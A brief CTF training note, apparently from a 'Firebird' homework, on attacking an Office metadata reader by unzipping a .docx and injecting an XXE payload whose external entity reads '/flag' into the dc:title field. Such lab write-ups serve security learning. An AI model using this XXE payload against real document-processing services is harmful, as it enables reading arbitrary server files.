Firebird - M$Office Meta Reader
tags: [[CTF]] [[firebird training]] [[XXE]]
Firebird Homework 9-B M$Office Meta Reader
Test for Injection Point


from here, learn to read xml of a .docx file:
unzip xxe.docx
grep -nr 'test1*' .
-> dc:titletest1</dc:title>injection:
<!DOCTYPE replace [<!ENTITY injection SYSTEM "/flag"> ]>
replace to
<dc:title>&injection;</dc:title>

Last updated